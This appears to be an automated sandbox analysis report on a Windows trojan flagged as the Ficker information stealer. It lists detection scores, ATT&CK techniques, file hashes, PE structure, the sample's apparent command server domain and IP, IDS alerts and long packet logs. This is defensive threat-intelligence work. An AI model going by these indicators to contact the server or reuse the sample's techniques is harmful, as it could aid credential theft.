      Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Command and Scripting Interpreter 2 | Boot or Logon Initialization Scripts | Process Injection 11 | Obfuscated Files or Information 3 | Credentials in Registry 2 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 22 | Credentials In Files 1 | System Information Discovery 44 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | Security Software Discovery 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 112 | SIM Card Swap |  | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 11 | LSA Secrets | Process Discovery 12 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Network Configuration Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      8s7bEDfYhT.exe | 56% | Virustotal |
      8s7bEDfYhT.exe | 90% | ReversingLabs | Win32.Trojan.Graftor
      8s7bEDfYhT.exe | 100% | Joe Sandbox ML |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      2.2.8s7bEDfYhT.exe.4915a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

      Domains

      Source | Detection | Scanner | Label
      sodaandcoke.top | 7% | Virustotal |

      URLs

      Source | Detection | Scanner | Label
      sodaandcoke.top:80 | 7% | Virustotal |
      sodaandcoke.top:80 | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      elb097307-934924932.us-east-1.elb.amazonaws.com | 54.225.155.255 | true | false |  | high
      sodaandcoke.top | 35.203.73.169 | true | false |  | unknown
      api.ipify.org | unknown | unknown | false |  | high

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      sodaandcoke.top:80 | true | 7%, Virustotal; Avira URL Cloud: safe | unknown
      http://api.ipify.org/?format=xml | false |  | high

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://api.ipify.org/?format=xmliC: | 8s7bEDfYhT.exe, 00000003.00000003.339794600.0000000000827000.00000004.00000001.sdmp | false |  | high
      http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl | 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmp | false |  | high

      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      54.225.155.255 | elb097307-934924932.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
      35.203.73.169 | sodaandcoke.top | United States | 15169 | GOOGLEUS | false

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:397819
                Start date:26.04.2021
                Start time:13:11:19
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:8s7bEDfYhT.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.phis.troj.spyw.evad.winEXE@3/2@3/2
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 95.1% (good quality ratio 91.4%)
                • Quality average: 84.8%
                • Quality standard deviation: 25.3%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 39
                • Number of non-executed functions: 49
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                Warnings:
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.82.210.154, 131.253.33.200, 13.107.22.200, 168.61.161.212, 104.43.139.144, 23.54.113.53, 40.88.32.150, 52.255.188.83, 13.107.4.50
                • Excluded domains from analysis (whitelisted): www.bing.com, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, store-images.s-microsoft.com-c.edgekey.net, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com, b1ns.c-0001.c-msedge.net, wu-fg-shim.trafficmanager.net, arc.msn.com, dual-a-0001.dc-msedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, b1ns.au-msedge.net
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs


                Domains


                ASN


                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\kaosdma.txt
                Process:C:\Users\user\Desktop\8s7bEDfYhT.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):10
                Entropy (8bit):2.8464393446710154
                Encrypted:false
                SSDEEP:3:HLLr:fr
                MD5:60B1FCE0F5D79C061DD6FECDAC64F306
                SHA1:1DF9D4411BEDD84FF3C6E6F41988F4CF6CC0D67F
                SHA-256:3C0ACD03C25C6940300B9A18362B6893BC7A5C11EE8F3140868E143ADBB4B8EE
                SHA-512:7B292792E06696C3B14539D800D4D2926DA2C3C30447D8AEED9E863174BAD3871CEEE19BC832F31A69A574AB3394C4ADF2B1C10A6F96140AD1AE6D2440E905A1
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 84.17.52.3
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\B6RX3BI4.txt
                Process:C:\Users\user\Desktop\8s7bEDfYhT.exe
                File Type:ASCII text, with no line terminators
                Category:downloaded
                Size (bytes):10
                Entropy (8bit):2.8464393446710154
                Encrypted:false
                SSDEEP:3:HLLr:fr
                MD5:60B1FCE0F5D79C061DD6FECDAC64F306
                SHA1:1DF9D4411BEDD84FF3C6E6F41988F4CF6CC0D67F
                SHA-256:3C0ACD03C25C6940300B9A18362B6893BC7A5C11EE8F3140868E143ADBB4B8EE
                SHA-512:7B292792E06696C3B14539D800D4D2926DA2C3C30447D8AEED9E863174BAD3871CEEE19BC832F31A69A574AB3394C4ADF2B1C10A6F96140AD1AE6D2440E905A1
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:http://api.ipify.org/?format=xml
                Preview: 84.17.52.3

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.382140458014918
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.94%
                • Clipper DOS Executable (2020/12) 0.02%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • VXD Driver (31/22) 0.00%
                File name:8s7bEDfYhT.exe
                File size:381966
                MD5:e0f6d15001d810320bbe9614c9365ca6
                SHA1:f589ae105a5b33e6fcca8afc7f8688652f7c5392
                SHA256:f009a71cf1050cc8c50a9b1accf3e28f174e75eda5f5ebb4764d90baa443aa9c
                SHA512:326e3f70cea545a3d0a1cc98d8feb9656ad0bfd39c8d36716a7fd7a4e65feeca57bea71d26e7c3e122af45b0ee95e5a87206f46a9942c5115b74fe2f94db985b
                SSDEEP:6144:XbkSyz/v91LEqvt5uXF9RXG/VG25A89xs+vWcQxm0JtBRLHe07cyQGTYRPp:XbkSyz/bQegVHXWhActuckJJtzL+L1RR
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......]...........

                File Icon

                Icon Hash:eeeddae2f25ae476

                Static PE Info

                General

                Entrypoint:0x402fa6
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x5DB4C581 [Sat Oct 26 22:15:29 2019 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:0
                File Version Major:5
                File Version Minor:0
                Subsystem Version Major:5
                Subsystem Version Minor:0
                Import Hash:ac7c395149149fcfaf0ed257b291de6e

                Entrypoint Preview

                Instruction
                call 00007F42D4441E70h
                jmp 00007F42D44393FEh
                mov edi, edi
                push ebp
                mov ebp, esp
                sub esp, 20h
                mov eax, dword ptr [ebp+08h]
                push esi
                push edi
                push 00000008h
                pop ecx
                mov esi, 0047B2E8h
                lea edi, dword ptr [ebp-20h]
                rep movsd
                mov dword ptr [ebp-08h], eax
                mov eax, dword ptr [ebp+0Ch]
                pop edi
                mov dword ptr [ebp-04h], eax
                pop esi
                test eax, eax
                je 00007F42D443958Eh
                test byte ptr [eax], 00000008h
                je 00007F42D4439589h
                mov dword ptr [ebp-0Ch], 01994000h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                push dword ptr [ebp-10h]
                push dword ptr [ebp-1Ch]
                push dword ptr [ebp-20h]
                call dword ptr [0047B09Ch]
                leave
                retn 0008h
                mov edi, edi
                push ebp
                mov ebp, esp
                push ecx
                push ebx
                mov eax, dword ptr [ebp+0Ch]
                add eax, 0Ch
                mov dword ptr [ebp-04h], eax
                mov ebx, dword ptr fs:[00000000h]
                mov eax, dword ptr [ebx]
                mov dword ptr fs:[00000000h], eax
                mov eax, dword ptr [ebp+08h]
                mov ebx, dword ptr [ebp+0Ch]
                mov ebp, dword ptr [ebp-04h]
                mov esp, dword ptr [ebx-04h]
                jmp eax
                pop ebx
                leave
                retn 0008h
                pop eax
                pop ecx
                xchg dword ptr [esp], eax
                jmp eax
                mov edi, edi
                push ebp
                mov ebp, esp
                push ecx
                push ecx
                push ebx
                push esi
                push edi
                mov esi, dword ptr fs:[00000000h]
                mov dword ptr [ebp-04h], esi
                mov dword ptr [ebp-08h], 00403060h
                push 00000000h
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp-08h]
                push dword ptr [ebp+08h]
                call 00007F42D445C74Fh
                mov eax, dword ptr [ebp+0Ch]
                mov eax, dword ptr [eax+04h]
                and eax, FFFFFFFDh
                mov ecx, dword ptr [ebp+0Ch]
                mov dword ptr [ecx+00h], eax

                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7ea9c | 0x28 | .new
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x7058 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0x1970 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x7da30 | 0x18 | .new
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x7d9e8 | 0x40 | .new
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x7b000 | 0x1d8 | .new
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                .text   0x1000           0x4dcf7       0x4de00   False     0.767781902087   data       7.54573831986  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data   0x4f000          0x29c28       0x1800    False     0.178548177083   data       2.08844026956  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .kug    0x79000          0x1           0x200     False     0.02734375       data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .tls    0x7a000          0x9           0x200     False     0.02734375       data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .new    0x7b000          0x453e        0x4600    False     0.370982142857   data       5.3686717182   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc   0x80000          0x7058        0x7200    False     0.60663377193    data       5.98363384389  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc  0x88000          0x1db8        0x1e00    False     0.698828125      data       6.13983891782  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                Name             RVA      Size    Type                                                       Language  Country
                RT_CURSOR        0x86bb0  0x134   data                                                       -         -
                RT_ICON          0x80360  0xea8   data                                                       Spanish   Chile
                RT_ICON          0x81208  0x8a8   data                                                       Spanish   Chile
                RT_ICON          0x81ab0  0x6c8   data                                                       Spanish   Chile
                RT_ICON          0x82178  0x568   GLS_BINARY_LSB_FIRST                                       Spanish   Chile
                RT_ICON          0x826e0  0x25a8  dBase III DBT, version number 0, next free block index 40  Spanish   Chile
                RT_ICON          0x84c88  0x10a8  data                                                       Spanish   Chile
                RT_ICON          0x85d30  0x988   dBase III DBT, version number 0, next free block index 40  Spanish   Chile
                RT_ICON          0x866b8  0x468   GLS_BINARY_LSB_FIRST                                       Spanish   Chile
                RT_STRING        0x86ec0  0x192   data                                                       Spanish   Chile
                RT_ACCELERATOR   0x86b98  0x18    data                                                       Spanish   Chile
                RT_GROUP_CURSOR  0x86ce8  0x14    Lotus unknown worksheet or configuration, revision 0x1     -         -
                RT_GROUP_ICON    0x86b20  0x76    data                                                       Spanish   Chile
                RT_VERSION       0x86d00  0x1c0   data                                                       -         -

                Imports

                DLL           Import
                KERNEL32.dll  WriteConsoleOutputCharacterW, FindResourceExW, FindResourceW, SetWaitableTimer, InterlockedIncrement, SetConsoleTextAttribute, GetCurrentProcess, GetModuleHandleExW, SetConsoleScreenBufferSize, SetTapeParameters, GetModuleHandleW, SetFileTime, TzSpecificLocalTimeToSystemTime, GetLocaleInfoW, SizeofResource, SetSystemTimeAdjustment, GetConsoleAliasW, GetFileAttributesW, SetTimeZoneInformation, TerminateProcess, FileTimeToSystemTime, GetCompressedFileSizeA, GlobalUnlock, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, SetFileAttributesA, GetAtomNameA, OpenWaitableTimerW, LocalAlloc, GlobalFindAtomW, GlobalWire, lstrcatW, VirtualProtect, FindAtomW, LocalFree, lstrcpyW, GetStartupInfoW, RaiseException, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FatalAppExitA, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, InitializeCriticalSectionAndSpinCount, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, CloseHandle, CreateFileA, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, ReadFile, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEndOfFile, GetProcessHeap, GetTimeZoneInformation, CompareStringA, CompareStringW, SetEnvironmentVariableA

                Version Infos

                DescriptionData
                InternalNamesgalimatimod
                FileVersions7.0.2.54
                LegalCopyrightsWsekde
                ProductVersions7.0.21.21
                Translation0x0139 0x0c6b

                Possible Origin

                Language of compilation system  Country where language is spoken
                Spanish                         Chile

                Network Behavior

                Snort IDS Alerts

                Timestamp                 Protocol  SID      Message                                     Source Port  Dest Port  Source IP      Dest IP
                04/26/21-13:12:08.554251  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:08.591033  ICMP      449      ICMP Time-To-Live Exceeded in Transit       -            -          84.17.52.126   192.168.2.6
                04/26/21-13:12:08.591389  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:08.628291  ICMP      449      ICMP Time-To-Live Exceeded in Transit       -            -          5.56.20.161    192.168.2.6
                04/26/21-13:12:08.629295  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:08.666226  ICMP      449      ICMP Time-To-Live Exceeded in Transit       -            -          91.206.52.152  192.168.2.6
                04/26/21-13:12:08.666913  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:12.369641  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:13.520112  TCP       2031132  ET TROJAN Win32/Ficker Stealer Activity M3  49714        80         192.168.2.6    35.203.73.169
                04/26/21-13:12:16.370123  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:19.770051  TCP       2031132  ET TROJAN Win32/Ficker Stealer Activity M3  49722        80         192.168.2.6    35.203.73.169
                04/26/21-13:12:20.370841  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:24.370953  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50
                04/26/21-13:12:28.371033  ICMP      384      ICMP PING                                   -            -          192.168.2.6    13.107.4.50

                TCP Packets

                Apr 26, 2021 13:12:18.758810043 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.758949995 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.759037971 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.759133101 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.759244919 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.759413004 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.895787954 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.895947933 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.896028042 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.896089077 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.896267891 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.896415949 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.896671057 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.896816969 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:18.897119045 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:18.897316933 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.033058882 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.033237934 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.033248901 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.033360004 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.033514977 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.033596039 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.033835888 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.033956051 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.034252882 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.034305096 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.034640074 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.034730911 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.035059929 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.035223961 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.035274982 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.035353899 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.035636902 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.035698891 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.169953108 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.169985056 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.170188904 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.170506954 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.170567036 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.170573950 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.170677900 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.170912027 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.171106100 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.171279907 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.171478987 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.171679020 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.171881914 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.172040939 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.172107935 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.172434092 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.172755003 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.172779083 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.172859907 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.262187958 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.307225943 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.307324886 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.307369947 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.307471991 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.307722092 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.307852030 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.307996035 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.308084965 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.308475971 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.308581114 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.308804989 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.308898926 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.308964014 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.309029102 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.309221029 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.309302092 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.309547901 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.309642076 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.309866905 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.309948921 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.399343014 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.399496078 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.444325924 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.444437027 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.444618940 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.444710970 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.444977045 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.445075035 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.445347071 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.445430040 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.445647955 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.445734978 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.446016073 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.446089029 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.446494102 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.446558952 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.446584940 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.446624041 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.581271887 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.581296921 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.581439972 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.581671953 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.581775904 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.582261086 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.582351923 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.582618952 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.582710028 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.582937956 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.583018064 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.583353043 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.583432913 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.583710909 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.583794117 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.584031105 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.584101915 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.718368053 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.718487978 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.718550920 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.718652964 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.718816042 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.718945980 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.719131947 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.719264984 CEST4971480192.168.2.635.203.73.169
